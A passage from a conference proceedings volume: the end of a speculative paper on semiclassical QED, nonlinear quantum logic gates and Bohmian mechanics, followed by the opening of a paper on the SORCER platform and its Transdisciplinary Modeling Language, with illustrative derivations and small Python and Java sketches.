$$S_{\mathrm{QED}} = \int d^4x \left[ -\frac{1}{4} F^{\mu\nu}F_{\mu\nu} + \bar\psi\,(i\gamma^\mu D_\mu - m)\,\psi \right]$$
Here $S$ is action, $x$ is space-time, $F$ is the electromagnetic field tensor, $\psi$ is the Dirac wave function, $\bar\psi$ is the conjugate transpose $\psi^\dagger\gamma^0$, the $\gamma^\mu$ are the Dirac matrices (given constants), $\mu, \nu$ are space-time indices in tensor notation, $m$ is mass and $D$ is the covariant derivative
$$D_\mu = \partial_\mu + ieA_\mu + ieB_\mu$$
where $A$ is the electromagnetic potential, $B$ is an external potential, and $e$ is the charge or coupling constant. Where it is standard, the physics notation $\partial_\mu = \frac{\partial}{\partial x^\mu}$ will be used. This system is intrinsically nonlinear. Below we will consider only one electromagnetic field.

The equations of motion in this system can be given by applying the Euler-Lagrange equations of the calculus of variations to obtain critical points of the action. To be more specific, in [9] the equation of motion of $\psi$ is
$$(i\gamma^\mu \partial_\mu - m)\psi = e\gamma^\mu A_\mu \psi,$$
that is, this gives the time rate of change of $\psi$ in a frame of reference. The equation of motion for the field $A$ can be reduced to
$$\Box A^\mu = e j^\mu$$
for a current $j$ by using the Lorenz gauge condition, and this is a natural form of Maxwell's equations. The standard form of Dirac's equation [10] for two fermions (with an additional scalar field $S$) is, for $i = 1, 2$ indexing the two particles,
$$[(\gamma_i)_\mu (p_i - A_i)^\mu + m_i + S_i]\psi = 0$$
where $\psi$ is now a 16-component function of the positions of both fermions, and
$$p_\mu = -i\frac{\partial}{\partial x^\mu}.$$
This agrees with the expression above, and Maxwell’s equations give an equation of motion for the field. These equations can be extended in a natural way to n particles. Here too there will be only one electromagnetic field A in our situation. This system will reflect interactions of fermions and photons, viewed as part of an electromagnetic field, fairly well, though it does ignore annihilation of fermions and their antiparticles, which is rarer. The approximation should be good enough that it should also be valid for a second-quantized electrodynamics to the extent calculations can be done in it, because it agrees with the individual interaction histories represented by Feynman diagrams. To expand on this, we next discuss photons.
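The step from the action to the equation of motion for $\psi$ quoted above can be written out explicitly. The sketch assumes the external potential is switched off ($B_\mu = 0$) and treats $\psi$ and $\bar\psi$ as independent fields in the variation, which is the usual convention.

```latex
% Vary S_QED with respect to \bar\psi; only the matter term depends on it.
\begin{align*}
\frac{\delta S_{\mathrm{QED}}}{\delta \bar\psi} = 0
  &\;\Longrightarrow\; (i\gamma^\mu D_\mu - m)\,\psi = 0, \\
D_\mu = \partial_\mu + ieA_\mu
  &\;\Longrightarrow\; i\gamma^\mu\partial_\mu\psi + i\,(ie)\,\gamma^\mu A_\mu\psi - m\psi = 0, \\
  &\;\Longrightarrow\; (i\gamma^\mu\partial_\mu - m)\,\psi = e\,\gamma^\mu A_\mu\,\psi .
\end{align*}
% The right-hand side contains the product A_\mu \psi, and A is itself
% sourced by a current built from \psi, so the coupled system for
% (\psi, A) is nonlinear.
```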
4 Fields and Photons
At the beginnings of quantum theory it was considered that possibly particles but not fields were quantized, and this seems to have been David Bohm's view. Before quantum mechanics was well-developed, methods did not exist that could realize this idea. If we use a (possibly less accurate and cruder) model in which the electromagnetic field is not quantized, then there must be a way to account for the effects which are accounted for by photons in the standard theory. One way to account for them is to say that the quantization of fermion systems means that interactions between fermions and force fields are also quantized. That is, photons are typically observed as the result of absorption by matter. This occurs when electrons in matter are raised to a higher energy state. For the natural frequencies involved, this will agree with Planck's law $E = h\nu$: that is a consequence of the Schrödinger equation in the form
$$\frac{ih}{2\pi}\frac{\partial}{\partial t}\psi = H\psi$$
when we search for solutions of the form $\exp(-i\omega t)\psi_1(x)$ using a separation of variables. So the interaction is quantized even if the field does not actually consist of photons; the effects of photons are still present.

An actual existence of photons in itself leads to strange conclusions: if the frequency and momentum are fixed then photons have a trigonometric form, which suggests that they extend through all time and space. This would also be true for free electrons, but it is more natural to consider electrons as bound but photons as free until they interact with matter. In our model we will assume that approximate photons do exist as wave packets within the electromagnetic field, that is, these exist mostly in bounded regions of space, and within those regions frequency and wavelength are approximately constant. These packets will spread as they travel, but perhaps no more than pulses from a laser.
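The separation-of-variables step behind Planck's law can be spelled out in two lines. The time dependence is taken here as $e^{-i\omega t}$, the sign for which the energy comes out positive under the sign convention of the Schrödinger equation as written in the text; the symbol $E$ for the eigenvalue is introduced only for this illustration.

```latex
% Insert \psi(x,t) = e^{-i\omega t}\,\psi_1(x) into (ih/2\pi)\,\partial_t\psi = H\psi.
\begin{align*}
\frac{ih}{2\pi}\,\frac{\partial}{\partial t}\bigl(e^{-i\omega t}\psi_1\bigr)
  &= \frac{ih}{2\pi}\,(-i\omega)\,e^{-i\omega t}\psi_1
   = \frac{h\omega}{2\pi}\,e^{-i\omega t}\psi_1, \\
H\psi_1 &= E\,\psi_1, \qquad
E = \frac{h\omega}{2\pi} = h\nu \quad (\omega = 2\pi\nu).
\end{align*}
```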
It would be somewhat natural to take the electromagnetic field for photons as the analogue of the probability wave field for electrons, in that they both can explain slit experiments and diffraction. The analogy must be made a little more complicated when it is to deal with more than one photon with different polarizations, which in the standard theory is a symmetrization of a tensor product. In order to fit this within a single electromagnetic field we will assume that the approximate photons are somewhat spatially separated portions of a single electromagnetic field. Otherwise we would need to allow some linear dependence among combinations of polarized photons.
5 Quantum Logic Gates
We do not have a definite proposal for a nonlinear quantum logic gate to be added to a standard set of linear quantum gates. The construction of linear quantum gates varies widely with the type of quantum effect used for qubits.
Trapped ion qubits are the current favorites. A quadrupole trap is constructed using an oscillating electric field at radio frequencies. This can use the Cirac-Zoller controlled-NOT gate [11]. The interaction of 2 qubits is mediated by an entire chain of qubits. This involves a specific sequence of 3 pulses. The qubits must be coupled.

In the Loss-DiVincenzo quantum dot computer [12] the spin-1/2 of electrons confined in quantum dots is used as the qubit. Gates are implemented by swap operations and rotations, with local magnetic fields. A pulsed inter-dot gate voltage is used so that there is a constant in the Hamiltonian which becomes time-dependent. A square root of a corresponding matrix gives the exchange.

Kane's quantum computer [13] involves a combination of nuclear magnetic resonance and electron spin; it passes from nuclear spin to electron spin. An alternating magnetic field allows the qubits to be manipulated. We alter the voltage on the metal A gates, which are metal attachments on top of an insulating silicon layer. This alters a resonant frequency and allows phosphorus donors within silicon to be dealt with individually. A potential on a J gate between two A gates draws donor electrons together and allows interactions of qubits.

Electron-on-helium qubits [14] use the binding of electrons to the surface of liquid helium. The electron is outside the helium and has a series of energy levels like the Rydberg series. Qubit operations are done by microwave fields exciting the Rydberg transition. The Coulomb interaction facilitates qubit interactions. There might be exchange interaction of adjacent qubits, but it is not clear if this is enough for powerful quantum interactions.

Topological quantum computers based on quantum surface effects on special materials like topological insulators might have the gates described in [6], which are a little complicated.
It might be said that a nonlinear gate will have to involve quantum field effects beyond those from quantum mechanics, and those effects cannot become too small as we work with a number of qubits. If particles are to have fairly high velocities and not leave the system, it is more convenient for their motion to be oscillatory or to travel a closed loop. It is also reasonable that it might use existing ideas from the above linear gates.
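For the quantum dot scheme mentioned above, one common reading of the "square root" remark is the $\sqrt{\mathrm{SWAP}}$ gate, whose square exchanges the states of two qubits. The sketch below checks this with the standard matrix form of $\sqrt{\mathrm{SWAP}}$ in the basis $|00\rangle, |01\rangle, |10\rangle, |11\rangle$; the helper names are hypothetical, and the link to a specific voltage pulse is not modeled.

```python
def matmul(a, b):
    """Product of two square matrices given as lists of rows."""
    n = len(a)
    return [[sum(a[i][k] * b[k][j] for k in range(n)) for j in range(n)]
            for i in range(n)]


def dagger(a):
    """Conjugate transpose of a square matrix."""
    n = len(a)
    return [[complex(a[j][i]).conjugate() for j in range(n)] for i in range(n)]


def close(a, b, tol=1e-12):
    """Entrywise comparison of two matrices up to a tolerance."""
    return all(abs(x - y) < tol for ra, rb in zip(a, b) for x, y in zip(ra, rb))


p = (1 + 1j) / 2
q = (1 - 1j) / 2

SQRT_SWAP = [[1, 0, 0, 0],
             [0, p, q, 0],
             [0, q, p, 0],
             [0, 0, 0, 1]]

SWAP = [[1, 0, 0, 0],
        [0, 0, 1, 0],
        [0, 1, 0, 0],
        [0, 0, 0, 1]]

IDENTITY = [[1 if i == j else 0 for j in range(4)] for i in range(4)]

# Applying the gate twice exchanges |01> and |10>; the gate itself is unitary.
print(close(matmul(SQRT_SWAP, SQRT_SWAP), SWAP))
print(close(matmul(SQRT_SWAP, dagger(SQRT_SWAP)), IDENTITY))
```

Both checks are linear-algebra facts about a linear gate; a nonlinear gate of the kind sought in this section would not be representable by a single fixed matrix acting on the state vector.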
6 Bohmian Mechanics
At this point we go even further into the realm of speculation, and the reader who does not enjoy this might prefer to stop here. The remainder is not presently relevant to quantum computing. The interpretation of quantum mechanics is often considered a matter of personal taste, and there is no unanimity on such an interpretation. The Copenhagen interpretation was dominant at one time, and the Everett many-worlds or multiverse interpretation is rather popular now. The interpretation by David Bohm grew out of ideas of Louis de Broglie that a fermion is not either a wave or a particle but a pair, a wave and a particle, where the wave is the usual probability wave and the particle can travel
faster than light, but only in a way which is unobservable and cannot transmit information, and the particle is guided by the wave. Special assumptions are needed to reconcile this with special relativity in terms of what can be observed. The most natural way to do this seems to be to assume there is a particular but physically unobservable space-time frame, and compute in it, but then transform the results if different frames are used. Workers in Bohmian mechanics, Durr et al. [4, 5], Dewdney and Horton [3], and Nikolić [7], have come up with versions which are consistent with special relativity. This is done in roughly two ways: either we specify a timelike vector field, as Durr does, or we say that each particle in a multiparticle system can have its individual time coordinate. It is more reasonable philosophically, however, to make an assumption which is not generally allowed in modern physics, namely that there is a hidden special coordinate frame for space-time. This might be considered as a way of breaking Lorentz symmetry. Siddhant Das and Markus Nöth [2], building on previous work with Detlef Durr, have studied experiments that might distinguish Bohmian mechanics from other interpretations of quantum mechanics.
7 A System of Equations
The mathematical formulation of the theory here is that it consists of five equation systems: (1) a version of the Dirac equation for systems involving any finite number of fermions and a given set of fields, which is the natural generalization of the system considered above; (2) the main equation of Bohmian mechanics

$$\frac{dx_i}{dt} = \frac{h}{2\pi m_i}\,\nabla_i\bigl(\operatorname{Im}(\ln(\psi))\bigr);$$

(3) Maxwell's equations of the electromagnetic field; (4) a way to account for creation and annihilation of fermion-anti-fermion pairs; (5) a way to obtain the electromagnetic field, which is, specifically, the same equations as for (1) in the semiclassical model. The 4th is a comparatively rare event. We propose that it is represented by a singularity in which the energy of the electromagnetic field increases by the amount lost when the fermion and anti-fermion are destroyed. This affects the Dirac equation by changing the number of particles and hence the dimensionality of the space on which ψ is defined. We must thus transform ψ when this event happens. This can be done by projecting ψ to the lower-dimensional space. Consider the analogous case of a Schrödinger equation with given electric fields which, for each particle, depend on its position. We can imagine that a solution is a limit of sums or linear combinations of products of functions which solve the equation for each of the separate particles; the projection then replaces, in each term, the functions for the deleted particles by 1. It can be seen that a linear combination of products of functions solving the equation for separate particles will satisfy the total equation, by the product rule for the time derivative and because the Laplacians and potential multiplications each affect only a single factor. For particle-antiparticle creation, we time-reverse the equations for
annihilation. This requires a theory in which singularities can be determined from the nonsingular points of a solution. Real-analytic functions, for instance, have this property. As previously mentioned, for (5) we can use a form of the free-space Maxwell equations. To this could be added a specification of the nature of the singularity of the field that would occur for a point particle such as an electron. This is similar to what can be done for Newtonian gravity by saying that the field is a free field with singularities which are first-order poles at the particles. Nikolić has observed that Bohmian theory might give an explanation of the success of the otherwise mysterious string theory and its huge number of variables: strings are approximations to Bohmian orbits. However, closed strings are usually thought of as smaller than closed orbits in Bohmian theory. In the Standard Model all the fields, such as the gluon field, have a classical version as well as a quantum version, because they are described in terms of Lagrangians. These can be added to the model at the beginning of this section, with these fields and with the particles of the Standard Model. Durr [5] has produced a Bohmian model of quantum gravity involving curved space. One can also consider quantum gravity in terms of gravitons. It is known that a hypothetical theory mediated by spin-2 gravitons must coincide essentially with general relativity as a non-quantum theory, regardless of the way the gravitons interact. The problem is that this theory is not renormalizable. This is not a problem for the theory of the previous section, which does not require renormalization. However, if we can produce a formal Lagrangian, then we might alternatively produce a classical gravity field in this way.
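As a worked illustration of equation (2) of this section, assume the polar form $\psi = R\,e^{2\pi i S/h}$ with real amplitude $R > 0$ and real phase $S$ (the symbols $R$, $S$, $p$ and $E$ are introduced here only for illustration). Under that assumption the guidance equation reduces to a gradient of the phase, and for a single plane wave it gives the expected constant velocity $p/m$:

```latex
\begin{aligned}
\ln\psi &= \ln R + \frac{2\pi i}{h}\,S,
\qquad \operatorname{Im}(\ln\psi) = \frac{2\pi}{h}\,S, \\
\frac{dx_i}{dt} &= \frac{h}{2\pi m_i}\,\nabla_i \operatorname{Im}(\ln\psi)
 = \frac{1}{m_i}\,\nabla_i S, \\
\psi &= e^{2\pi i (p\cdot x - E t)/h}
\;\Longrightarrow\; S = p\cdot x - E t
\;\Longrightarrow\; \frac{dx}{dt} = \frac{p}{m}.
\end{aligned}
```

The separability argument used for the projection step can be sketched in the same spirit, assuming a Hamiltonian $H = \sum_k H_k$ in which each $H_k$ acts only on the coordinates of particle $k$, and factors $\varphi_k$ that each solve their own one-particle equation:

```latex
\begin{aligned}
\frac{ih}{2\pi}\,\partial_t \varphi_k &= H_k \varphi_k, \qquad \psi = \prod_k \varphi_k, \\
\frac{ih}{2\pi}\,\partial_t \psi
 &= \sum_k \Bigl(\frac{ih}{2\pi}\,\partial_t \varphi_k\Bigr) \prod_{j \neq k} \varphi_j
 = \sum_k \bigl(H_k \varphi_k\bigr) \prod_{j \neq k} \varphi_j
 = H\psi .
\end{aligned}
```

By linearity, any linear combination of such products also satisfies the total equation.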
8 Conclusion
A semiclassical field theory is nonlinear and appears to be a suitable setting in which the Abrams-Lloyd Theorem would provide a theoretical quantum computer that could solve NP-complete problems fairly directly. The question of specific nonlinear quantum logic gates is left for the future. It seems possible that this semiclassical theory is not just an approximation but is an accurate model of fields which avoids convergence problems. Moreover this semiclassical theory extends to a unified theory of all four forces, which is also compatible with Bohmian ideas.
References
1. Abrams, D.S., Lloyd, S.: Nonlinear quantum mechanics implies polynomial-time solution for NP-complete and #P problems. arXiv:quant-ph/9801041
2. Das, S., Nöth, M.: Times of arrival and gauge invariance. arXiv:2102.02661
3. Dewdney, C., Horton, G.: Relativistically invariant extension of the de Broglie-Bohm theory of quantum mechanics. arXiv:quant-ph/0202104
4. Durr, D., Goldstein, S., Norsen, T., Struyve, W., Zanghì, N.: Can Bohmian mechanics be made relativistic? arXiv:1307.1714
5. Durr, D., Struyve, W.: Quantum Einstein equations. arXiv:2003.03839
6. Bonderson, P., Das Sarma, S., Freedman, M., Nayak, C.: A blueprint for a topologically fault-tolerant quantum computer. arXiv:1003.2856
7. Nikolić, H.: Relativistic quantum mechanics and quantum field theory. arXiv:1203.1139
8. Valiant, L., Vazirani, V.: NP is as easy as detecting unique solutions. Theoret. Comput. Sci. 47, 85–93 (1986)
9. Wikipedia article, Quantum Electrodynamics. https://en.wikipedia.org/wiki/Quantum_electrodynamics
10. Wikipedia article, Two-body Dirac equations. https://en.wikipedia.org/wiki/Two-body_Dirac_equations
11. Wikipedia article, Trapped ion quantum computer. https://en.wikipedia.org/wiki/Trapped_ion_quantum_computer
12. Wikipedia article, Spin qubit quantum computer. https://en.wikipedia.org/wiki/Spin_qubit_quantum_computer
13. Wikipedia article, Kane quantum computer. https://en.wikipedia.org/wiki/Kane_quantum_computer
14. Wikipedia article, Electron-on-helium qubit. https://en.wikipedia.org/wiki/Electron-on-helium_qubit
Service-Oriented Multidisciplinary Computing: From Code Providers to Transdisciplines
Michael Sobolewski (1, 2)
(1) Air Force Research Laboratory, WPAFB, Dayton, OH 45433, USA
(2) Polish Japanese Academy of IT, 02-008 Warsaw, Poland
Abstract. True service-oriented architecture provides a set of guidelines and the semantically relevant language for expressing and realizing combined request services by a netcentric platform. The Transdisciplinary Modeling Language (TDML) is an executable language in the SORCER platform based on service abstraction (everything is a service) and three pillars of service orientation: contextion (context awareness), multifidelity, and multityping of code providers in the network. TDML allows for defining complex polymorphic disciplines of disciplines (transdisciplines) as services that can express, reconfigure, and morph large distributed multidisciplinary processes at runtime. In this paper, an approach applicable to complex multidisciplinary systems is presented with five types of nested service aggregations into distributed transdisciplines.
Keywords: True service orientation · Contextion · Multifidelities · Multityping · Transdisciplines · Emergent systems · SORCER
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 372–384, 2023. https://doi.org/10.1007/978-3-031-28073-3_27
1 Introduction
Service-oriented architecture (SOA) emerged as an approach to combat the complexity and challenges of large monolithic applications by letting replaceable remote/local component services cooperate with one another at runtime, as long as the semantics of the component service is the same. However, despite many efforts, there is no good consensus on the netcentric semantics of a service or on how to do true SOA well. A true SOA should provide a clear answer to the question: how can a service consumer consume and combine functionality from service providers when it does not know where those providers are or even how to communicate with them? In TDML service-oriented modeling, three types of services are distinguished: operation services and two types of request services, elementary and combined. An operation service, in short opservice, invokes an operation of its code provider. TDML opservices never communicate directly with service providers in the network. An elementary request service asks an opservice for output data given input data. A combined request service specifies cooperation of hierarchically organized multiple request services that in turn
execute operation services. Therefore, a service consumer utilizes output results of multiple executed request and operation services. The end user who creates request services and utilizes the created service partnership of code providers becomes both the coproducer and the consumer. Software developers develop code providers provisioned in the network, but the end users relying on code providers develop combined services by reflecting their experiences, creativity, and innovation. Such coproduction is the source of innovation and competitive advantage. The Service-ORiented Computing EnviRonment (SORCER) [6–10] adheres to the true SO architecture based on formalized service abstractions and the three pillars of SO programming. Evolution of the presented approach started with the FIPER project [5], funded by NIST ($21.5 million) at the beginning of this millennium, then continued at the SORCER/TTU Laboratory [9], and matured for real-world aerospace applications at the Multidisciplinary Science and Technology Center, AFRL/WPAFB [1–3]. The mathematical approach for the SORCER platform is presented in [7, 8]. In this paper the focus is on a transdisciplinary programming environment for SORCER.
2 Disciplines and Intents in TDML
A discipline is considered as a system of rules governing computation in a particular field of study. Multidisciplinary science is the science of multidisciplinary process expression. A discipline considered as a system of multiple cooperating disciplines is called a transdiscipline. A transdisciplinary process is a systemic form of multidisciplinary processes. The Transdisciplinary Modeling Language (TDML) focuses on transdisciplinary process expression and on the execution of transdisciplines as disciplines of disciplines. In mathematical terminology, if a discipline is a function, then a transdiscipline is a functional (higher-order function). An intent is a service context of a requestor, whereas a transdisciplinary intent is a context of contexts that specifies relationships between disciplinary contexts of the transdiscipline and related parts so that a change to one propagates intended data and control flow to the others. It is a kind of ontology that represents the ideas, concepts, and criteria defined by the designer to be important for expressing and executing the multidisciplinary process. It should express both functional and technical needs of the multidisciplinary process. The transdisciplinary approach is service-oriented: functionality is what a service provider does or is used for, while a service is an act of serving in which a service requestor takes the responsibility that something desirable happens on behalf of other services represented by service requestors or service providers. Thus, a discipline represents a service provider while a discipline intent represents a discipline requestor. Service orientation implies that, to a large extent, everything is a service; thus both requestors and providers represent services. Disciplines of disciplines and their parts form hierarchically organized service cooperations at runtime.
Service cooperation partitions workloads between collaborating request and provider services. At the bottom of the cooperative service hierarchy code providers make local and/or remote calls to run executable codes of domain-specific applications, tools, and utilities (ATUs).
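The statement that a discipline is a function and a transdiscipline is a higher-order function can be made concrete with a small sketch. The code below is only an illustration under simplifying assumptions: contexts are plain maps of named numbers, the names Discipline and transdiscipline are hypothetical, and nothing here is the SORCER or TDML API.

```java
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.function.UnaryOperator;

// Illustrative sketch only: hypothetical names, not the SORCER/TDML API.
final class TransdisciplineSketch {

    /** A discipline modeled as a function from an input context to an output context. */
    interface Discipline extends UnaryOperator<Map<String, Double>> { }

    /** A transdiscipline as a higher-order function: it takes disciplines and returns a discipline. */
    static Discipline transdiscipline(List<Discipline> parts) {
        return context -> {
            Map<String, Double> current = new LinkedHashMap<>(context);
            for (Discipline part : parts) {
                // each component discipline sees the results of the earlier ones
                current.putAll(part.apply(current));
            }
            return current;
        };
    }

    public static void main(String[] args) {
        Discipline area = cxt -> Map.of("area", cxt.get("width") * cxt.get("height"));
        Discipline cost = cxt -> Map.of("cost", 2.5 * cxt.get("area"));
        Discipline both = transdiscipline(List.of(area, cost));
        System.out.println(both.apply(Map.of("width", 2.0, "height", 3.0)));
    }
}
```

Because the composed result is itself a Discipline, it can be passed to transdiscipline again, which mirrors the idea of disciplines of disciplines at several levels of granularity.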
2.1 The Service-Oriented Conceptualization of TDML
A code provider corresponds to the actualization of an opservice. A single opservice represents an elementary request service, but a combined request service is actualized by a cooperation of code providers. Therefore, a combined request service may represent a process expression realized by the cooperation of many request services and, finally, the corresponding execution of code providers in the network. In TDML, combined services express hierarchically organized disciplinary dependencies. Transdisciplines are combined services at various levels of granularity. Granularity refers to the extent to which a larger discipline is subdivided into smaller distinguishable disciplines. Cohesion of a discipline is a measure of the strength of the relationship between dependencies of the discipline. High cohesion of disciplines often correlates with loose coupling, and vice versa. Operational services (opservices) represent the lowest service granularity and refer to executable codes of functions, procedures, and methods of local/remote objects. The design principle of aggregating all input/output data into service contexts, and of using contexts by all cooperating services working in unison, is called service context awareness. Service context awareness, also called data contextion, is a form of parametric polymorphism. A contextion is a mapping from an input service context to an output service context. Using service contexts, a contextion can be expressed generically so that it can handle values without depending on individual argument types. Request services as contextions are generic services that form the core of SO programming [8]. Service disciplines are aggregations of contextions, as illustrated in Fig. 1. A service domain is either a routine (imperative domain) or a model (declarative domain), or an aggregation of both. Domain aggregations are called transdomains.
They provide for declarative/imperative transitions of domains within a transdomain. Transroutine and Transmodel contextions are subtypes of the Transdomain type. The service-oriented TDML semantics (from code providers to transdisciplines) and the relationships between service types are illustrated in Fig. 1. Combined disciplinary request services at the bottom of their service hierarchy are actualized by executable codes of code providers. A workload of a code provider is expressed by a service signature, sig(op, tp), where an operation op of tp has to be executed by a code provider of type tp. A code provider may implement multiple service types, each with multiple operations. Therefore, a signature type can be generalized to a multitype that serves as a classifier of service providers in the network. A multitype signature sig(op, tp1, tp2, ..., tpn) is an association of a service operation op of tp1 and a multitype in the form of the list of service types tp1, tp2, ..., tpn to be implemented by a service provider. The operation op is specified by the first service type in the list of service types. If all service types of a signature are interface types, then such a signature is called remote. If the first type is a class type, then the signature is called local. Note that the binding of remote signatures to code providers in the network is dynamic, specified only by service types (interfaces considered as service contracts) to be implemented by the code provider. Service signatures used in request services are free variables to be bound at runtime to redundant instances of code providers available or provisionable in the network. To provision a code provider in the network, the signature needs to declare a deployment configuration as follows:
sig(op, tp, deploy(config("myCfg"), idle("1h")))
where myCfg is a configuration file and idle specifies that after one hour of idle time the code provider should be deprovisioned. Provisioning of code providers in SORCER is supported by Rio technology [12]. In the case of instantiation with local signatures, the instances of a given code provider type are constructed at runtime. Therefore, service signatures provide a uniform representation for the instantiation of local, remote, and on-demand provisioned code providers. Service signatures are fundamental enablers of true service orientation in TDML and SORCER [8]. Opservices (evaluators and signatures in TDML) are bound to code providers (ATUs) at runtime. They are used by elementary services (entries and tasks) to create the executable foundation for all combined request services. Service entries are elementary services that represent functionals (higher-order functions), procedures (first-order functions), and system calls via corresponding opservices. Service tasks use service signatures predominantly to represent net-centric local/remote object-oriented invocations. A signature binds to a code provider but does not know where the provider is or even how to communicate with it; this is the basic principle of net-centricity in TDML, implemented with the Jini technology [11].
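The rules for multitype signatures (the operation belongs to the first type, all-interface signatures are remote, a leading class type makes the signature local) can be sketched with plain Java reflection. This is a hypothetical value type written for illustration, assuming Java 16 or later for records; it is not the SORCER Signature class and performs no network lookup.

```java
import java.util.List;

// Illustrative sketch only: a hypothetical value type, not the SORCER Signature class.
final class MultitypeSignatureSketch {

    /** Pairs an operation name with the ordered service types a provider must implement. */
    record Sig(String operation, List<Class<?>> types) {

        static Sig sig(String operation, Class<?>... types) {
            if (types.length == 0) {
                throw new IllegalArgumentException("at least one service type is required");
            }
            return new Sig(operation, List.of(types));
        }

        /** The operation is specified by the first (primary) service type. */
        Class<?> primaryType() {
            return types.get(0);
        }

        /** Remote: every service type is an interface, that is, a service contract. */
        boolean isRemote() {
            return types.stream().allMatch(Class::isInterface);
        }

        /** Local: the first type is a class type rather than an interface. */
        boolean isLocal() {
            return !primaryType().isInterface();
        }

        /** A candidate provider matches when it implements all declared service types. */
        boolean matches(Object provider) {
            return types.stream().allMatch(t -> t.isInstance(provider));
        }
    }

    public static void main(String[] args) {
        Sig remote = Sig.sig("length", CharSequence.class, Comparable.class);
        Sig local = Sig.sig("toString", StringBuilder.class);
        System.out.println(remote.isRemote() + " " + local.isLocal() + " " + remote.matches("abc"));
    }
}
```

In this sketch the multitype acts as a classifier: a provider is acceptable only if it satisfies every listed type, which is the role the text assigns to multitypes during lookup.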
Fig. 1. TDML Service-Oriented Conceptualization: From Code Providers (Actualization) to Consumers of Multidisciplinary Services Realized by Service Requestors
2.2 Three Pillars of Service Orientation
The presented semantics of service orientation can be summarized by the three SO pillars (indicated in red in Fig. 1) as follows:
1. Contextion allows a service to be specified generically, so that it can handle context data uniformly, with the required data types of context entries consistent with the ontologies of service providers. Contextion, as a form of parametric polymorphism, makes an SO language more expressive with one generic type for inputs and outputs of all request services.
2. Morphing a request service is affected by the initial fidelities selected by the user and by the morphers of morph-fidelities. Morphers associated with morph-fidelities use heuristics provided by the end user that depend on the input service contexts and on subsequent intermediate results obtained from service providers. Multifidelity management is a dispatch mechanism, a kind of ad hoc polymorphism, in which fidelities of request services are reconfigured or morphed with fidelity projection at runtime.
3. Service multityping, as applied to service signatures to be bound at runtime to code providers, is a multiple form of subtype polymorphism whose goal is to find a remote instance of the code provider by the range of service types that the code provider implements and registers for lookup. It also allows a multifidelity opservice to call an operation of a primary service type implemented by the service provider as an alternate service fidelity.
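The first two pillars can be sketched together: a contextion as one generic context-to-context type, and a multifidelity service whose selected fidelity is morphed at runtime from the input context and the latest result. The sketch assumes contexts are maps of named numbers; Contextion, Morpher and MultiFiService are hypothetical names and do not reproduce the SORCER fidelity API.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.BiFunction;
import java.util.function.UnaryOperator;

// Illustrative sketch only: hypothetical names, not the SORCER/TDML fidelity API.
final class MultifidelitySketch {

    /** A contextion: a mapping from an input service context to an output service context. */
    interface Contextion extends UnaryOperator<Map<String, Double>> { }

    /** A morpher picks the fidelity for later calls from the input context and the latest result. */
    interface Morpher extends BiFunction<Map<String, Double>, Map<String, Double>, String> { }

    /** A request service with several named fidelities, one of which is selected at a time. */
    static final class MultiFiService {
        private final Map<String, Contextion> fidelities = new LinkedHashMap<>();
        private Morpher morpher = (in, out) -> null;   // default: never morph
        private String selected;

        MultiFiService fidelity(String name, Contextion service) {
            fidelities.put(name, service);
            if (selected == null) {
                selected = name;                       // the first fidelity is the initial selection
            }
            return this;
        }

        MultiFiService morpher(Morpher m) {
            this.morpher = m;
            return this;
        }

        String selected() {
            return selected;
        }

        Map<String, Double> exec(Map<String, Double> input) {
            if (selected == null) {
                throw new IllegalStateException("no fidelity declared");
            }
            Map<String, Double> output = fidelities.get(selected).apply(input);
            String next = morpher.apply(input, output);
            if (next != null && fidelities.containsKey(next)) {
                selected = next;                       // reconfigure the service for later calls
            }
            return output;
        }
    }

    public static void main(String[] args) {
        MultiFiService svc = new MultiFiService()
                .fidelity("coarse", cxt -> Map.of("y", 2.0 * cxt.get("x")))
                .fidelity("fine", cxt -> Map.of("y", 2.0 * cxt.get("x") + 0.5))
                .morpher((in, out) -> out.get("y") > 10.0 ? "fine" : null);
        svc.exec(Map.of("x", 6.0));
        System.out.println("selected after first call: " + svc.selected());
    }
}
```

The heuristic in the morpher (switch to the finer fidelity once the result exceeds a threshold) is an arbitrary example of a user-provided rule; the third pillar, multityping, concerns provider lookup by service types and is not modeled here.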
3 Discipline Instantiation and Initialization
In multidisciplinary programming, an instance is a concrete occurrence of any discipline, usually existing during the runtime of a multidisciplinary program. An instance emphasizes the distinct identity of the discipline. The creation of an instance is called instantiation, and initialization is the assignment of initial values to data items used by a transdiscipline itself and its component disciplines. In Sect. 2.1 service signatures are described as the constructors of code providers used by elementary request services. Signatures dynamically prepare instances for use at runtime, often accepting multitypes to be implemented by a required instance of a code provider. Multitype signatures may create new local code providers, bind to existing ones in the network, or provision remote instances on demand. Below, the instantiation of request services is presented by so-called builder signatures that use static operations of declared builder types. A discipline builder is a design pattern that provides a flexible solution to the creation of various types of transdisciplines (disciplines of disciplines). The purpose of the discipline builder is to separate the construction of a complex discipline from its representation and initial data. The discipline builder describes how to encapsulate creating and assembling the parts of a complex discipline along with its data initialization. In SORCER, builders are Java classes that may extend the Builder utility class. Therefore, a discipline delegates its creation to a builder instead of creating the discipline directly. This allows a discipline representation, called a builder signature, to be changed later independently of (without having to change) the domain itself. A builder signature is a representation of an entity that is closely and distinctively associated and identified with a service provider, requestor, or intent. A builder signature declares the corresponding entity builder.
In TDML, a builder signature is expressed as follows:
sig(op, bt) or
sig(op, bt, init(att, val), ...) or
sig(op, bt, initContext, init(att, val), ...)
where bt is the builder type; op is its static operation; initContext represents the initialization context (a collection of attribute–value pairs) used by the builder, usually by its initialize method; and init(att, val) declares the initialization of the attribute att with the value val. Multiple init attribute-value pairs can be given.
3.1 Explicit Discipline Instantiation with Builder Signatures
The TDML instantiation operator inst is specified as follows:
inst(sig(bt)) or
inst(sig(op, bt)) or
inst(sig(op, bt, init(att, val), ...)) or
inst(sig(op, bt, initContext)) or
inst(sig(op, bt, initContext, init(att, val), ...))
where bt is a builder class type and op is its static builder operation. The first case corresponds to the default constructor of the class bt.
3.2 Implicit Discipline Instantiation by Intents
intent(
    dscSig(builderSignature) or
    dscSig(op, bt) or
    dscSig(op, bt, init(att, val) ...), or
    dscSig(op, bt, initContext) or
    dscSig(op, bt, initContext, init(att, val)
    // other parts and builders of executable intent
    ...)
)
where dscSig stands for the operator declaring a discipline builder signature.
